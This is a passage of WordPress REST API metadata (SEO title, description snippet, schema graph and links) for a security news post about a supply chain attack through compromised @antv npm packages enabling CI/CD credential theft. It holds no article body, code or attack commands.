theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=55895","og_locale":"en_US","og_type":"article","og_title":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-20T19:28:40&#8243;,&#8221;description&#8221;:&#8221;Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. A threat actor compromised an _@antv_ maintainer account...","og_url":"https:\/\/zero.redgem.net\/?p=55895","og_site_name":"zero redgem","article_published_time":"2026-05-20T14:41:29+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. 
reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=55895#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=55895"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5","datePublished":"2026-05-20T14:41:29+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=55895"},"wordCount":2742,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","mssecure","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=55895#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=55895","url":"https:\/\/zero.redgem.net\/?p=55895","name":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-20T14:41:29+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=55895#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=55895"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=55895#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero 
redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=55895"}],"version-history":[{"count":0,"href":"htt
ps:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55895\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=55895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=55895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=55895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}